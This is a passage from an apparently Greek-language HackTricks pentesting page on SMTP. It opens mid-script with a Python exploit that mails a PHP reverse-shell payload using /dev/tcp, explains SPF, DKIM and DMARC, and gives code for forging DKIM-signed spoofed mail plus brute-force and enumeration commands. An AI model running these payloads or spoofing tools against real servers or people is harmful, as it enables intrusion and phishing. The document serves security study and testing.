lhost = “127.0.0.1” lport = 443 rhost = “192.168.1.1” rport = 25 # 489,587

create message object instance

msg = MIMEMultipart()

setup the parameters of the message

password = “” msg[‘From’] = “attacker@local” msg[‘To’] = “victim@local” msg[‘Subject’] = “This is not a drill!”

payload

message = (“& /dev/tcp/%s/%d 0>&1'); ?>” % (lhost,lport))

print(“[*] Payload is generated : %s” % message)

msg.attach(MIMEText(message, ‘plain’)) server = smtplib.SMTP(host=rhost,port=rport)

if server.noop()[0] != 250: print(“[-]Connection Error”) exit()

server.starttls()

Uncomment if log-in with authencation

server.login(msg[‘From’], password)

server.sendmail(msg[‘From’], msg[‘To’], msg.as_string()) server.quit()

print(“[***]successfully sent email to %s:” % (msg[‘To’]))

</details>

## SMTP Smuggling

Η ευπάθεια SMTP Smuggling επέτρεπε την παράκαμψη όλων των προστασιών SMTP (δείτε την επόμενη ενότητα για περισσότερες πληροφορίες σχετικά με τις προστασίες). Για περισσότερες πληροφορίες σχετικά με το SMTP Smuggling δείτε:


<a class="content_ref" href="smtp-smuggling.md"><span class="content_ref_label">SMTP Smuggling</span></a>

## Μέτρα αντιμετώπισης για Mail Spoofing

Οι οργανισμοί αποτρέπουν την αποστολή μη εξουσιοδοτημένων email εκ μέρους τους χρησιμοποιώντας **SPF**, **DKIM**, και **DMARC** λόγω της ευκολίας πλαστογράφησης των μηνυμάτων SMTP.

Ένας **πλήρης οδηγός για αυτά τα μέτρα** είναι διαθέσιμος στο [https://seanthegeek.net/459/demystifying-dmarc/](https://seanthegeek.net/459/demystifying-dmarc/).

### SPF

> [!CAUTION]
> SPF [χαρακτηρίστηκε "deprecated" το 2014](https://aws.amazon.com/premiumsupport/knowledge-center/route53-spf-record/). Αυτό σημαίνει ότι αντί να δημιουργείτε ένα **TXT record** στο `_spf.domain.com` το δημιουργείτε στο `domain.com` χρησιμοποιώντας την **ίδια σύνταξη**.\
> Επιπλέον, για επαναχρησιμοποίηση προηγούμενων spf records είναι αρκετά κοινό να βρείτε κάτι σαν `"v=spf1 include:_spf.google.com ~all"`

**Sender Policy Framework** (SPF) είναι ένας μηχανισμός που επιτρέπει στους Mail Transfer Agents (MTAs) να επαληθεύουν εάν ένας host που στέλνει ένα email είναι εξουσιοδοτημένος, ερωτώντας μια λίστα εξουσιοδοτημένων mail servers που ορίζονται από τους οργανισμούς. Αυτή η λίστα, η οποία προσδιορίζει διευθύνσεις/εύρη IP, domains και άλλες οντότητες **εξουσιοδοτημένες να στέλνουν email εξ ονόματος ενός domain**, περιλαμβάνει διάφορα "**Mechanisms**" στο SPF record.

#### Mechanisms

From [Wikipedia](https://en.wikipedia.org/wiki/Sender_Policy_Framework):

| Mechanism | Description                                                                                                                                                                                                                                                                                                                         |
| --------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| ALL       | Ταιριάζει πάντα· χρησιμοποιείται ως προεπιλεγμένο αποτέλεσμα, π.χ. `-all` για όλες τις IP που δεν ταιριάξαν με προηγούμενους μηχανισμούς.                                                                                                                                                                                              |
| A         | Ταιριάζει αν το domain έχει address record (A ή AAAA) που μπορεί να επιλυθεί στη διεύθυνση του αποστολέα.                                                                                                                                                                                                                           |
| IP4       | Ταιριάζει αν ο αποστολέας ανήκει στο δοθέν IPv4 address range.                                                                                                                                                                                                                                                                        |
| IP6       | Ταιριάζει αν ο αποστολέας ανήκει στο δοθέν IPv6 address range.                                                                                                                                                                                                                                                                        |
| MX        | Ταιριάζει αν το domain έχει MX record που επιλύεται στη διεύθυνση του αποστολέα (δηλ. το mail προέρχεται από έναν από τους εισερχόμενους mail servers του domain).                                                                                                                                                                      |
| PTR       | Ταιριάζει αν το domain name (PTR record) για τη διεύθυνση του client είναι μέσα στο δοθέν domain και εκείνο το domain name επιλύεται στη διεύθυνση του client (forward-confirmed reverse DNS). Αυτός ο μηχανισμός αποθαρρύνεται και πρέπει να αποφεύγεται, εάν είναι δυνατό.                                                      |
| EXISTS    | Ταιριάζει αν το δοθέν domain name επιλύεται σε οποιαδήποτε διεύθυνση (ασχέτως ποια). Σπάνια χρησιμοποιείται. Σε συνδυασμό με τη SPF macro γλώσσα προσφέρει πιο σύνθετα matches όπως DNSBL-queries.                                                                                                                                     |
| INCLUDE   | Αναφέρεται στην πολιτική άλλου domain. Αν η πολιτική εκείνου του domain περνάει, αυτός ο μηχανισμός περνάει. Ωστόσο, αν η συμπερίληψη αποτύχει, η επεξεργασία συνεχίζεται. Για πλήρη ανάθεση στην πολιτική άλλου domain πρέπει να χρησιμοποιηθεί η redirect επέκταση.                                                                        |
| REDIRECT  | <p>Ένα redirect είναι ένας pointer προς άλλο domain που φιλοξενεί μια SPF πολιτική· επιτρέπει σε πολλαπλά domains να μοιράζονται την ίδια πολιτική SPF. Είναι χρήσιμο όταν δουλεύετε με μεγάλο αριθμό domains που μοιράζονται την ίδια email υποδομή.</p><p>Η SPF policy του domain που υποδεικνύεται στο redirect Mechanism θα χρησιμοποιηθεί.</p> |

It's also possible to identify **Qualifiers** that indicates **what should be done if a mechanism is matched**. By default, the **qualifier "+"** is used (so if any mechanism is matched, that means it's allowed).\
You usually will note **at the end of each SPF policy** something like: **\~all** or **-all**. This is used to indicate that **if the sender doesn't match any SPF policy, you should tag the email as untrusted (\~) or reject (-) the email.**

#### Qualifiers

Each mechanism within the policy may be prefixed by one of four qualifiers to define the intended result:

- **`+`**: Αντιστοιχεί σε αποτέλεσμα PASS. Από προεπιλογή οι μηχανισμοί θεωρούν αυτό το qualifier, κάνοντας το `+mx` ισοδύναμο με `mx`.
- **`?`**: Αντιπροσωπεύει NEUTRAL αποτέλεσμα, αντιμετωπιζόμενο παρομοίως με NONE (χωρίς συγκεκριμένη πολιτική).
- **`~`**: Δείχνει SOFTFAIL, λειτουργώντας ως ενδιάμεση κατάσταση ανάμεσα σε NEUTRAL και FAIL. Τα email με αυτό το αποτέλεσμα συνήθως γίνονται αποδεκτά αλλά επισημαίνονται αναλόγως.
- **`-`**: Υποδεικνύει FAIL, προτείνοντας ότι το email πρέπει να απορριφθεί άμεσα.

In the upcoming example, the **SPF policy of google.com** is illustrated. Note the inclusion of SPF policies from different domains within the first SPF policy:
```shell-session
dig txt google.com | grep spf
google.com.             235     IN      TXT     "v=spf1 include:_spf.google.com ~all"

dig txt _spf.google.com | grep spf
; <<>> DiG 9.11.3-1ubuntu1.7-Ubuntu <<>> txt _spf.google.com
;_spf.google.com.               IN      TXT
_spf.google.com.        235     IN      TXT     "v=spf1 include:_netblocks.google.com include:_netblocks2.google.com include:_netblocks3.google.com ~all"

dig txt _netblocks.google.com | grep spf
_netblocks.google.com.  1606    IN      TXT     "v=spf1 ip4:35.190.247.0/24 ip4:64.233.160.0/19 ip4:66.102.0.0/20 ip4:66.249.80.0/20 ip4:72.14.192.0/18 ip4:74.125.0.0/16 ip4:108.177.8.0/21 ip4:173.194.0.0/16 ip4:209.85.128.0/17 ip4:216.58.192.0/19 ip4:216.239.32.0/19 ~all"

dig txt _netblocks2.google.com | grep spf
_netblocks2.google.com. 1908    IN      TXT     "v=spf1 ip6:2001:4860:4000::/36 ip6:2404:6800:4000::/36 ip6:2607:f8b0:4000::/36 ip6:2800:3f0:4000::/36 ip6:2a00:1450:4000::/36 ip6:2c0f:fb50:4000::/36 ~all"

dig txt _netblocks3.google.com | grep spf
_netblocks3.google.com. 1903    IN      TXT     "v=spf1 ip4:172.217.0.0/19 ip4:172.217.32.0/20 ip4:172.217.128.0/19 ip4:172.217.160.0/20 ip4:172.217.192.0/19 ip4:172.253.56.0/21 ip4:172.253.112.0/20 ip4:108.177.96.0/19 ip4:35.191.0.0/16 ip4:130.211.0.0/22 ~all"

Παραδοσιακά ήταν δυνατό να γίνει spoof οποιοδήποτε domain name που δεν είχε σωστό/ή οποιοδήποτε SPF record. Σήμερα, αν email προέρχεται από ένα domain χωρίς ένα έγκυρο SPF record, πιθανότατα θα απορριφθεί/σημειωθεί αυτόματα ως μη αξιόπιστο.

Για να ελέγξετε το SPF ενός domain μπορείτε να χρησιμοποιήσετε online εργαλεία όπως: https://www.kitterman.com/spf/validate.html

DKIM (DomainKeys Identified Mail)

Το DKIM χρησιμοποιείται για να υπογράφει εξερχόμενα email, επιτρέποντας την επικύρωσή τους από εξωτερικά Mail Transfer Agents (MTAs) μέσω ανάκτησης του public key του domain από το DNS. Αυτό το public key βρίσκεται στο TXT record του domain. Για πρόσβαση σε αυτό το κλειδί, πρέπει να γνωρίζετε τόσο τον selector όσο και το domain name.

Για παράδειγμα, για να ζητήσετε το κλειδί, το domain name και ο selector είναι απαραίτητα. Αυτά μπορούν να βρεθούν στο mail header DKIM-Signature, π.χ. d=gmail.com;s=20120113.

Μια εντολή για να ανακτήσετε αυτήν την πληροφορία μπορεί να μοιάζει ως εξής:

dig 20120113._domainkey.gmail.com TXT | grep p=
# This command would return something like:
20120113._domainkey.gmail.com. 280 IN   TXT    "k=rsa\; p=MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1Kd87/UeJjenpabgbFwh+eBCsSTrqmwIYYvywlbhbqoo2DymndFkbjOVIPIldNs/m40KF+yzMn1skyoxcTUGCQs8g3

DMARC (Domain-based Message Authentication, Reporting & Conformance)

Το DMARC ενισχύει την ασφάλεια των email βασιζόμενο στα πρωτόκολλα SPF και DKIM. Ορίζει πολιτικές που καθοδηγούν τους διακομιστές αλληλογραφίας στον χειρισμό των μηνυμάτων από ένα συγκεκριμένο domain, συμπεριλαμβανομένου του τρόπου αντιμετώπισης αποτυχιών πιστοποίησης και του πού να αποστέλλονται αναφορές σχετικά με ενέργειες επεξεργασίας email.

Για να αποκτήσετε το DMARC record, πρέπει να κάνετε query τον υποτομέα _dmarc

# Reject
dig _dmarc.facebook.com txt | grep DMARC
_dmarc.facebook.com.	3600	IN	TXT	"v=DMARC1; p=reject; rua=mailto:a@dmarc.facebookmail.com; ruf=mailto:fb-dmarc@datafeeds.phishlabs.com; pct=100"

# Quarantine
dig _dmarc.google.com txt | grep DMARC
_dmarc.google.com.	300	IN	TXT	"v=DMARC1; p=quarantine; rua=mailto:mailauth-reports@google.com"

# None
dig _dmarc.bing.com txt | grep DMARC
_dmarc.bing.com.	3600	IN	TXT	"v=DMARC1; p=none; pct=100; rua=mailto:BingEmailDMARC@microsoft.com;"

Ετικέτες DMARC

Τι γίνεται με τους υποτομείς;

Από here.
Πρέπει να έχετε ξεχωριστά SPF records για κάθε υποτομέα από τον οποίο θέλετε να στέλνετε email.
Το παρακάτω δημοσιεύτηκε αρχικά στο openspf.org, που παλαιότερα ήταν πολύτιμος πόρος για τέτοια θέματα.

The Demon Question: What about subdomains?

If I get mail from pielovers.demon.co.uk, and there’s no SPF data for pielovers, should I go back one level and test SPF for demon.co.uk? No. Each subdomain at Demon is a different customer, and each customer might have their own policy. It wouldn’t make sense for Demon’s policy to apply to all its customers by default; if Demon wants to do that, it can set up SPF records for each subdomain.

So the advice to SPF publishers is this: you should add an SPF record for each subdomain or hostname that has an A or MX record.

Sites with wildcard A or MX records should also have a wildcard SPF record, of the form: * IN TXT “v=spf1 -all”

Αυτό βγάζει νόημα — ένας υποτομέας μπορεί πολύ καλά να βρίσκεται σε διαφορετική γεωγραφική τοποθεσία και να έχει πολύ διαφορετικό ορισμό SPF.

Open Relay

Όταν στέλνονται email, είναι κρίσιμο να διασφαλίζεται ότι δεν θα χαρακτηριστούν ως spam. Αυτό επιτυγχάνεται συχνά μέσω της χρήσης ενός relay server που εμπιστεύεται ο παραλήπτης. Ωστόσο, ένα συνηθισμένο πρόβλημα είναι ότι οι administrators μπορεί να μην γνωρίζουν πλήρως ποιες IP σειρές είναι ασφαλές να επιτρέψουν. Αυτή η έλλειψη κατανόησης μπορεί να οδηγήσει σε λάθη στη ρύθμιση του SMTP server, ένας κίνδυνος που συχνά εντοπίζεται σε security assessments.

Μια λύση-παραβίαση που μερικοί administrators χρησιμοποιούν για να αποφύγουν προβλήματα παράδοσης email, ειδικά για επικοινωνίες με πιθανούς ή ενεργούς πελάτες, είναι να επιτρέπουν συνδέσεις από οποιαδήποτε IP διεύθυνση. Αυτό γίνεται με τη ρύθμιση της παραμέτρου mynetworks του SMTP server ώστε να αποδέχεται όλες τις IP διευθύνσεις, όπως φαίνεται παρακάτω:

mynetworks = 0.0.0.0/0

Για να ελεγχθεί αν ένας διακομιστής αλληλογραφίας είναι open relay (που σημαίνει ότι θα μπορούσε να προωθήσει email από οποιαδήποτε εξωτερική πηγή), το εργαλείο nmap χρησιμοποιείται συχνά. Περιλαμβάνει ένα συγκεκριμένο script σχεδιασμένο για να το δοκιμάσει. Η εντολή για να διεξαχθεί μια verbose σάρωση σε έναν διακομιστή (για παράδειγμα με IP 10.10.10.10) στη θύρα 25 χρησιμοποιώντας nmap είναι:

nmap -p25 --script smtp-open-relay 10.10.10.10 -v

Εργαλεία

• https://github.com/serain/mailspoof Ελέγξτε για λανθασμένες ρυθμίσεις SPF και DMARC
• https://pypi.org/project/checkdmarc/ Αυτόματη λήψη ρυθμίσεων SPF και DMARC

Αποστολή Spoof Email

• https://www.mailsploit.com/index
• http://www.anonymailer.net/
• https://emkei.cz/

Ή μπορείτε να χρησιμοποιήσετε ένα εργαλείο:

• https://github.com/magichk/magicspoofing

# This will send a test email from test@victim.com to destination@gmail.com
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com
# But you can also modify more options of the email
python3 magicspoofmail.py -d victim.com -t -e destination@gmail.com --subject TEST --sender administrator@victim.com

Warning

Αν αντιμετωπίσετε οποιοδήποτε σφάλμα κατά τη χρήση της dkim python lib κατά την ανάλυση του κλειδιού, μπορείτε να χρησιμοποιήσετε το ακόλουθο.
ΣΗΜΕΙΩΣΗ: Αυτό είναι απλώς μια πρόχειρη λύση για να κάνετε γρήγορους ελέγχους σε περιπτώσεις όπου για κάποιο λόγο το ιδιωτικό κλειδί του openssl δεν μπορεί να αναλυθεί από το dkim.

-----BEGIN RSA PRIVATE KEY-----
MIICXgIBAAKBgQDdkohAIWT6mXiHpfAHF8bv2vHTDboN2dl5pZKG5ZSHCYC5Z1bt
spr6chlrPUX71hfSkk8WxnJ1iC9Moa9sRzdjBrxPMjRDgP8p8AFdpugP5rJJXExO
pkZcdNPvCXGYNYD86Gpous6ubn6KhUWwDD1bw2UFu53nW/AK/EE4/jeraQIDAQAB
AoGAe31lrsht7TWH9aJISsu3torCaKyn23xlNuVO6xwdUb28Hpk327bFpXveKuS1
koxaLqQYrEriFBtYsU8T5Dc06FQAVLpUBOn+9PcKlxPBCLvUF+/KbfHF0q1QbeZR
fgr+E+fPxwVPxxk3i1AwCP4Cp1+bz2s58wZXlDBkWZ2YJwECQQD/f4bO2lnJz9Mq
1xsL3PqHlzIKh+W+yiGmQAELbgOdX4uCxMxjs5lwGSACMH2nUwXx+05RB8EM2m+j
ZBTeqxDxAkEA3gHyUtVenuTGClgYpiwefaTbGfYadh0z2KmiVcRqWzz3hDUEWxhc
GNtFT8wzLcmRHB4SQYUaS0Df9mpvwvdB+QJBALGv9Qci39L0j/15P7wOYMWvpwOf
422+kYxXcuKKDkWCTzoQt7yXCRzmvFYJdznJCZdymNLNu7q+p2lQjxsUiWECQQCI
Ms2FP91ywYs1oWJN39c84byBKtiFCdla3Ib48y0EmFyJQTVQ5ZrqrOrSz8W+G2Do
zRIKHCxLapt7w0SZabORAkEAxvm5pd2MNVqrqMJHbukHY1yBqwm5zVIYr75eiIDP
K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
-----END RSA PRIVATE KEY-----

Ή μπορείτε να το κάνετε χειροκίνητα:

# This will send an unsigned message
mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");

# Code from https://github.com/magichk/magicspoofing/blob/main/magicspoofmail.py

import os
import dkim #pip3 install dkimpy
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase

# Set params
destination="destination@gmail.com"
sender="administrator@victim.com"
subject="Test"
message_html="""
<html>
<body>
<h3>This is a test, not a scam</h3>
<br />
</body>
</html>
"""
sender_domain=sender.split("@")[1]

# Prepare postfix
os.system("sudo sed -ri 's/(myhostname) = (.*)/\\1 = "+sender_domain+"/g' /etc/postfix/main.cf")
os.system("systemctl restart postfix")

# Generate DKIM keys
dkim_private_key_path="dkimprivatekey.pem"
os.system(f"openssl genrsa -out {dkim_private_key_path} 1024 2> /dev/null")
with open(dkim_private_key_path) as fh:
dkim_private_key = fh.read()

# Generate email
msg = MIMEMultipart("alternative")
msg.attach(MIMEText(message_html, "html"))
msg["To"] = destination
msg["From"] = sender
msg["Subject"] = subject
headers = [b"To", b"From", b"Subject"]
msg_data = msg.as_bytes()

# Sign email with dkim
## The receiver won't be able to check it, but the email will appear as signed (and therefore, more trusted)
dkim_selector="s1"
sig = dkim.sign(message=msg_data,selector=str(dkim_selector).encode(),domain=sender_domain.encode(),privkey=dkim_private_key.encode(),include_headers=headers)
msg["DKIM-Signature"] = sig[len("DKIM-Signature: ") :].decode()
msg_data = msg.as_bytes()

# Use local postfix relay to send email
smtp="127.0.0.1"
s = smtplib.SMTP(smtp)
s.sendmail(sender, [destination], msg_data)

Περισσότερες πληροφορίες

Βρείτε περισσότερες πληροφορίες για αυτές τις προστασίες στο https://seanthegeek.net/459/demystifying-dmarc/

Άλλοι δείκτες phishing

• Ηλικία του domain
• Links pointing to IP addresses
• Link manipulation techniques
• Suspicious (uncommon) attachments
• Κατεστραμμένο περιεχόμενο email
• Τιμές που χρησιμοποιούνται και διαφέρουν από αυτές των κεφαλίδων του mail
• Υπαρξη έγκυρου και αξιόπιστου SSL πιστοποιητικού
• Υποβολή της σελίδας σε ιστότοπους φιλτραρίσματος περιεχομένου web

Exfiltration through SMTP

Αν μπορείτε να στείλετε δεδομένα μέσω SMTP read this.

Αρχείο ρυθμίσεων

Postfix

Συνήθως, αν είναι εγκατεστημένο, το /etc/postfix/master.cf περιέχει scripts to execute όταν, για παράδειγμα, ένα νέο mail λαμβάνεται από έναν χρήστη. Για παράδειγμα η γραμμή flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient} σημαίνει ότι το /etc/postfix/filtering θα εκτελεστεί εάν ένα νέο mail παραληφθεί από τον χρήστη mark.

Άλλα αρχεία ρυθμίσεων:

sendmail.cf
submit.cf

Αναφορές

• https://research.nccgroup.com/2015/06/10/username-enumeration-techniques-and-their-value/
• https://www.reddit.com/r/HowToHack/comments/101it4u/what_could_hacker_do_with_misconfigured_smtp/
• 0xdf – HTB/VulnLab JobTwo: Word VBA macro phishing via SMTP → hMailServer credential decryption → Veeam CVE-2023-27532 to SYSTEM
• https://21ad.netlify.app/blogs/the-silent-inbox-how-verified-emails-slip-past-email-security-gateways/

Αυτόματες Εντολές HackTricks

Protocol_Name: SMTP    #Protocol Abbreviation if there is one.
Port_Number:  25,465,587     #Comma separated if there is more than one.
Protocol_Description: Simple Mail Transfer Protocol          #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for SMTP
Note: |
SMTP (Simple Mail Transfer Protocol) is a TCP/IP protocol used in sending and receiving e-mail. However, since it is limited in its ability to queue messages at the receiving end, it is usually used with one of two other protocols, POP3 or IMAP, that let the user save messages in a server mailbox and download them periodically from the server.

https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-smtp/index.html

Entry_2:
Name: Banner Grab
Description: Grab SMTP Banner
Command: nc -vn {IP} 25

Entry_3:
Name: SMTP Vuln Scan
Description: SMTP Vuln Scan With Nmap
Command: nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 {IP}

Entry_4:
Name: SMTP User Enum
Description: Enumerate uses with smtp-user-enum
Command: smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}

Entry_5:
Name: SMTPS Connect
Description: Attempt to connect to SMTPS two different ways
Command: openssl s_client -crlf -connect {IP}:465 &&&& openssl s_client -starttls smtp -crlf -connect {IP}:587

Entry_6:
Name: Find MX Servers
Description: Find MX servers of an organization
Command: dig +short mx {Domain_Name}

Entry_7:
Name: Hydra Brute Force
Description: Need Nothing
Command: hydra -P {Big_Passwordlist} {IP} smtp -V

Entry_8:
Name: consolesless mfs enumeration
Description: SMTP enumeration without the need to run msfconsole
Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

• Ελέγξτε τα σχέδια συνδρομής!
• Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
• Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.